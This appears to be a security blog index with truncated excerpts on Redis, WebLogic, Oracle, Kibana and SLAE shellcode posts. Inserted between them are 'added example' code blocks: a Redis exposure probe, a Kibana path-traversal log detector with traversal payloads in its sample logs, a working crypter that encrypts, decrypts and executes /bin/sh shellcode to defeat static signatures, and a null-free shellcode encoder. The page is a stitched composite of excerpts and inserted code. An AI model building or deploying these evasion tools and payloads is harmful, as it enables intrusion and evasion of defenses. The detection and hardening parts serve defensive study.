Redis service unauthenticated write access to OS file system

Redis is an in-memory key-value database. Because of that design, typical use cases are session caching, full-page caching, message queues, leaderboards and counting, among others. By default, the service listens on port 6379. In my case, Redis was running on a range of ports, 7081-7090. So an nmap …
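An added example, not code from the original post: a small probe that speaks RESP directly (the protocol redis-cli uses), pipelines PING and CONFIG GET dir to each port, and reports whether the instance answers without AUTH and whether CONFIG is still reachable. That second check matters because changing the dump directory and file name through CONFIG is what an unauthenticated write to the OS file system depends on. The host 127.0.0.1 and the verdict labels are assumptions; the port range is the one the post mentions.

```python
"""Probe Redis ports for unauthenticated access and an exposed CONFIG command.

Added example, not code from the original post. The host and the verdict
labels are assumptions; 6379 is the default port, 7081-7090 the post's range.
"""
import socket


class RespError(str):
    """A RESP error reply (the '-' type), kept distinct from a normal string."""


class Incomplete(ValueError):
    """Raised when the buffer does not yet hold a complete reply."""


def encode_command(*args: str) -> bytes:
    """Serialize a command the way redis-cli does: a RESP array of bulk strings."""
    parts = [f"*{len(args)}\r\n".encode()]
    for arg in args:
        raw = arg.encode()
        parts.append(b"$%d\r\n%s\r\n" % (len(raw), raw))
    return b"".join(parts)


def parse_reply(buf: bytes):
    """Parse one RESP reply from buf and return (value, unconsumed_bytes)."""
    kind, rest = buf[:1], buf[1:]
    line, sep, rest = rest.partition(b"\r\n")
    if not kind or not sep:
        raise Incomplete("need more bytes")
    if kind == b"+":                      # simple string, e.g. +PONG
        return line.decode(), rest
    if kind == b"-":                      # error, e.g. -NOAUTH Authentication required.
        return RespError(line.decode()), rest
    if kind == b":":                      # integer
        return int(line), rest
    if kind == b"$":                      # bulk string; -1 is the null bulk string
        length = int(line)
        if length < 0:
            return None, rest
        if len(rest) < length + 2:
            raise Incomplete("partial bulk string")
        return rest[:length].decode(), rest[length + 2:]
    if kind == b"*":                      # array: recurse for each element
        items = []
        for _ in range(int(line)):
            item, rest = parse_reply(rest)
            items.append(item)
        return items, rest
    raise ValueError(f"unknown RESP type {kind!r}")


def classify(ping_reply, config_reply) -> str:
    """Turn the replies to PING and CONFIG GET dir into an exposure verdict."""
    if isinstance(ping_reply, RespError):
        if ping_reply.startswith("NOAUTH"):
            return "auth-required"
        if ping_reply.startswith("DENIED"):      # protected-mode refusal
            return "protected-mode"
        return f"error: {ping_reply}"
    if ping_reply != "PONG":
        return "not-redis"
    # No AUTH needed. If CONFIG answers, dir/dbfilename can be changed, which is
    # what writing a dump file to an arbitrary location on the host needs.
    if isinstance(config_reply, list) and len(config_reply) == 2 and config_reply[0] == "dir":
        return f"unauthenticated, CONFIG exposed (dir={config_reply[1]})"
    return "unauthenticated, CONFIG renamed/disabled"


def probe(host: str, port: int, timeout: float = 3.0) -> str:
    """Connect, pipeline PING and CONFIG GET dir, and classify the answers."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.settimeout(timeout)
            sock.sendall(encode_command("PING") + encode_command("CONFIG", "GET", "dir"))
            buf = b""
            while True:
                try:
                    chunk = sock.recv(4096)
                except socket.timeout:
                    return "no reply"
                if not chunk:
                    return "no reply"
                buf += chunk
                try:
                    ping, rest = parse_reply(buf)
                except Incomplete:
                    continue
                except ValueError:
                    return "not-redis"
                if isinstance(ping, RespError):
                    return classify(ping, None)   # server may close after an error reply
                try:
                    cfg, _ = parse_reply(rest)
                except Incomplete:
                    continue
                except ValueError:
                    return "not-redis"
                return classify(ping, cfg)
    except OSError as exc:
        return f"unreachable ({exc})"


if __name__ == "__main__":
    for port in [6379, *range(7081, 7091)]:
        print(f"{port}: {probe('127.0.0.1', port)}")
```

A verdict of "unauthenticated, CONFIG exposed" is the finding to fix: set requirepass (or ACLs), keep protected-mode on, bind to a non-public interface, and rename or disable CONFIG in redis.conf so the dump path cannot be redirected.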

CVE-2018-2894 – Weblogic JSP File Upload

Oracle WebLogic suffers from a trivial file upload vulnerability. Here are the steps to reproduce it. 1) Go to http://172.17.0.2:7001/ws_utc/config.do. If you can’t access 172.17.0.2:7001/ws_utc, the web service test client is disabled on your WebLogic server, which is a good thing. 2) Change the Work Home …

CVE-2018-3004 – Oracle Database Privilege Escalation via XML Deserialization

Since this is a privilege escalation, let’s assume you already have access to an Oracle database with at least the CONNECT and RESOURCE roles. In this example the user tom has been granted the CONNECT and RESOURCE roles. XML Deserialization: the java.beans library has two classes, XMLEncoder to serialize a Java object …

CVE-2018-17246 – Kibana Local File Inclusion

Logstash is an open source tool for collecting, parsing and storing logs for later use. Kibana is a web interface for searching and viewing the logs that Logstash has indexed. Both are built to work with Elasticsearch, and Elasticsearch, Logstash and Kibana used together are known as the ELK stack. Vulnerability: Affected URL: http://<IP>:5601/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../<js file> Affected Parameter: apis The …
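An added example, not code from the original post: detection logic for the affected URL above, run over a few constructed access-log lines. The check does what the server should have done with the apis parameter, joining it onto the plugin’s spec directory, resolving the .. segments and rejecting anything that lands outside, so the same function serves as a log rule and as the input validation. The spec directory path is an assumption; only the fact that apis is joined onto some directory matters for the traversal test.

```python
"""Spot CVE-2018-17246 probes (Kibana console `apis` traversal) in access logs.

Added example, not code from the original post. The log lines are constructed
and the spec directory used to decide whether a path escapes is an assumption.
"""
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed location of the console plugin's API spec files; any directory works
# for the traversal test as long as it is the one the `apis` value is joined to.
SPEC_DIR = "/usr/share/kibana/src/core_plugins/console/api_server/spec"

# Constructed sample access log (Apache/NCSA common format), not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Nov/2018:10:01:02 +0000] "GET /api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=es_6_0 HTTP/1.1" 200 5120
10.0.0.9 - - [12/Nov/2018:10:01:07 +0000] "GET /api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../tmp/payload.js HTTP/1.1" 200 12
10.0.0.9 - - [12/Nov/2018:10:01:09 +0000] "GET /api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=..%252F..%252F..%252F..%252Fetc%252Fpasswd HTTP/1.1" 500 0
10.0.0.7 - - [12/Nov/2018:10:02:00 +0000] "GET /app/kibana HTTP/1.1" 200 7000
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def escapes_base(apis: str, base: str = SPEC_DIR) -> bool:
    """True when joining `apis` onto the spec directory leaves that directory.

    The value is percent-decoded once more to catch double-encoded separators
    (%252F -> %2F -> /), then normalised so that `..` segments are resolved.
    An absolute path also escapes, because posixpath.join discards the base.
    """
    base = posixpath.normpath(base)
    target = posixpath.normpath(posixpath.join(base, unquote(apis)))
    return not (target == base or target.startswith(base + "/"))


def scan(log_text: str) -> list:
    """Return one finding per request whose `apis` value escapes the spec dir."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if not url.path.startswith("/api/console/api_server"):
            continue
        for apis in parse_qs(url.query).get("apis", []):   # parse_qs decodes once
            if escapes_base(apis):
                findings.append({"ip": m["ip"], "apis": unquote(apis), "status": int(m["status"])})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ip']} -> {f['apis']} (HTTP {f['status']})")
```

The second hit returns HTTP 500 because the target is not a JavaScript file, but it is still a traversal attempt and should be alerted on; the status code tells you whether it worked, not whether it happened.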

SLAE 0x7 – Custom crypter

Crypters are programs that encrypt an executable or shellcode, decrypt it at runtime and then run it. The idea is to use a key to encrypt the shellcode; the encrypted shellcode is later decrypted with the same key and executed. To understand this further we will create our own crypter using the AES encryption …
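An added example, not the crypter from the original post, showing both halves of the idea: a build step that encrypts the shellcode under a passphrase, and a runtime step that verifies and decrypts it before handing it to an executable mapping. The post uses AES; to stay on the Python standard library this version substitutes a SHA-256 counter-mode keystream with an HMAC-SHA256 tag, keys derived with PBKDF2, which is a plain swap and not the post’s construction. The sample payload is the common 23-byte Linux x86 execve("/bin/sh") shellcode; the execution stub is Linux-only and only runs when you pass --run.

```python
"""Shellcode crypter: encrypt with a passphrase, decrypt at runtime, then execute.

Added example, not the crypter from the original post. The post uses AES; this
version substitutes a SHA-256 counter-mode keystream plus an HMAC-SHA256 tag
(encrypt-then-MAC) so it runs on the standard library alone. The sample payload
is the common 23-byte Linux x86 execve("/bin/sh") shellcode.
"""
import ctypes
import hashlib
import hmac
import mmap
import os
import sys

SHELLCODE = bytes.fromhex("31c050682f2f7368682f62696e89e3505389e1b00bcd80")

SALT_LEN, NONCE_LEN, TAG_LEN = 16, 12, 32


def derive_keys(passphrase: str, salt: bytes) -> tuple:
    """PBKDF2-SHA256 -> (encryption key, MAC key); one key per job."""
    km = hashlib.pbkdf2_hmac("sha256", passphrase.encode(), salt, 100_000, dklen=64)
    return km[:32], km[32:]


def keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Counter-mode keystream: SHA256(key || nonce || counter) blocks, truncated."""
    blocks, counter = [], 0
    while 32 * len(blocks) < length:
        blocks.append(hashlib.sha256(key + nonce + counter.to_bytes(4, "big")).digest())
        counter += 1
    return b"".join(blocks)[:length]


def xor(a: bytes, b: bytes) -> bytes:
    """Byte-wise XOR of two equal-length strings."""
    return bytes(x ^ y for x, y in zip(a, b))


def encrypt(shellcode: bytes, passphrase: str) -> bytes:
    """Build step: return salt || nonce || ciphertext || tag for embedding."""
    salt, nonce = os.urandom(SALT_LEN), os.urandom(NONCE_LEN)
    enc_key, mac_key = derive_keys(passphrase, salt)
    ct = xor(shellcode, keystream(enc_key, nonce, len(shellcode)))
    tag = hmac.new(mac_key, salt + nonce + ct, "sha256").digest()
    return salt + nonce + ct + tag


def decrypt(blob: bytes, passphrase: str) -> bytes:
    """Runtime step: check the tag first, then strip the keystream."""
    if len(blob) < SALT_LEN + NONCE_LEN + TAG_LEN:
        raise ValueError("blob too short")
    salt = blob[:SALT_LEN]
    nonce = blob[SALT_LEN:SALT_LEN + NONCE_LEN]
    ct, tag = blob[SALT_LEN + NONCE_LEN:-TAG_LEN], blob[-TAG_LEN:]
    enc_key, mac_key = derive_keys(passphrase, salt)
    expected = hmac.new(mac_key, salt + nonce + ct, "sha256").digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("wrong passphrase or tampered payload")
    return xor(ct, keystream(enc_key, nonce, len(ct)))


def run_shellcode(code: bytes) -> None:
    """Execute decrypted bytes: RWX anonymous mapping, copy, call. Linux only."""
    page = mmap.mmap(-1, len(code), prot=mmap.PROT_READ | mmap.PROT_WRITE | mmap.PROT_EXEC)
    page.write(code)
    addr = ctypes.addressof(ctypes.c_char.from_buffer(page))
    ctypes.CFUNCTYPE(None)(addr)()


if __name__ == "__main__":
    blob = encrypt(SHELLCODE, "s3cret")
    print(f"crypted payload ({len(blob)} bytes): {blob.hex()}")
    plain = decrypt(blob, "s3cret")
    assert plain == SHELLCODE
    if "--run" in sys.argv:   # 32-bit payload: only meaningful under a 32-bit Python on Linux
        run_shellcode(plain)
```

The tag check before decryption is the part a quick crypter usually skips: without it a wrong key or a corrupted blob produces garbage that gets jumped to, and with it the loader fails closed. The ciphertext also changes on every build because of the fresh salt and nonce, which is what defeats a static signature on the embedded bytes.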

SLAE 0x6 – Polymorphic Shellcode

Anti-virus and IDS vendors constantly create signatures for each new type of shellcode to keep their products up to date against attacks. But malware developers also try to stay ahead of the game by finding new ways to evade AV/IDS. Today we will cover creating polymorphic shellcode, which is often used to defeat signature …

SLAE 0x5 – Shellcode Analysis

Today, we find shellcode on various websites like shell-storm.org, exploit-db.com and other internet forums. Running shellcode without understanding the code could have catastrophic results. For instance, a shellcode could run rm -rf on the file system even though the comments in the shellcode say otherwise. Therefore, I think it’s important we learn what’s going …

SLAE 0x4 – Custom Encoder

Encoding is the process of converting data from one form to another. Encoding is very different from encryption. Encoding converts data using an algorithm that can be easily reversed, with no secret needed. The purpose of encoding is simply to transform data into another form that can be consumed by another system. Encryption, on the other hand, is used to …
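An added example, not the encoder from the original post: a custom XOR-then-rotate encoder with its matching decoder, a search for parameters that leave the encoded bytes null-free (the usual reason to encode shellcode at all), and output formatters for a NASM decoder stub and a C test harness. The scheme and the parameter search are my own choice for illustration; the sample is the common 23-byte Linux x86 execve("/bin/sh") shellcode. Note that anyone who has the stub can reverse this, which is exactly the difference from encryption that the paragraph above draws.

```python
"""XOR-then-rotate shellcode encoder with matching decoder and null-byte check.

Added example, not the encoder from the original SLAE post. The scheme (XOR
each byte with a key, then rotate right) and the parameter search are my own;
the sample is the common 23-byte Linux x86 execve("/bin/sh") shellcode.
"""

SHELLCODE = bytes.fromhex("31c050682f2f7368682f62696e89e3505389e1b00bcd80")


def ror8(value: int, bits: int) -> int:
    """Rotate an 8-bit value right."""
    return ((value >> bits) | (value << (8 - bits))) & 0xFF


def rol8(value: int, bits: int) -> int:
    """Rotate an 8-bit value left (inverse of ror8)."""
    return ((value << bits) | (value >> (8 - bits))) & 0xFF


def encode(shellcode: bytes, key: int, rot: int) -> bytes:
    """Encoder: byte ^ key, then ror. Reversible by anyone who knows the scheme."""
    return bytes(ror8(b ^ key, rot) for b in shellcode)


def decode(encoded: bytes, key: int, rot: int) -> bytes:
    """Decoder: undo the rotate, then the XOR; the asm stub mirrors this loop."""
    return bytes(rol8(b, rot) ^ key for b in encoded)


def find_params(shellcode: bytes) -> tuple:
    """Pick (key, rot) such that the encoded bytes contain no 0x00.

    A byte encodes to zero exactly when it equals the key, so any key absent
    from the shellcode works; the rotate count is kept in 1..7 so that the
    immediates in the decoder stub are themselves null-free.
    """
    for key in range(1, 256):
        if key in shellcode:
            continue
        for rot in range(1, 8):
            enc = encode(shellcode, key, rot)
            if 0 not in enc:
                return key, rot
    raise ValueError("no null-free parameters found")


def as_nasm_db(data: bytes) -> str:
    """Format for pasting into the decoder stub: db 0x..,0x..,..."""
    return "db " + ",".join(f"0x{b:02x}" for b in data)


def as_c_string(data: bytes) -> str:
    """Format for a C test harness: "\\x..\\x.."..."""
    return '"' + "".join(f"\\x{b:02x}" for b in data) + '"'


if __name__ == "__main__":
    key, rot = find_params(SHELLCODE)
    enc = encode(SHELLCODE, key, rot)
    assert decode(enc, key, rot) == SHELLCODE
    print(f"key=0x{key:02x} rot={rot} len={len(enc)} nulls={enc.count(0)}")
    print(as_nasm_db(enc))
    print(as_c_string(enc))
```

The decoder in the final payload is the only thing that needs to know key and rot; both are immediates in the stub, which is why the search keeps them non-zero.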

SLAE 0x3 – Egghunter Shellcode

An egghunter is a small piece of shellcode that searches memory for an 8-byte egg that we deliberately place there. Once found, the egg marks the start of a much larger region of memory where our shellcode can run. Egghunters are very useful in a buffer overflow situation where we control the flow of the program but cannot execute our …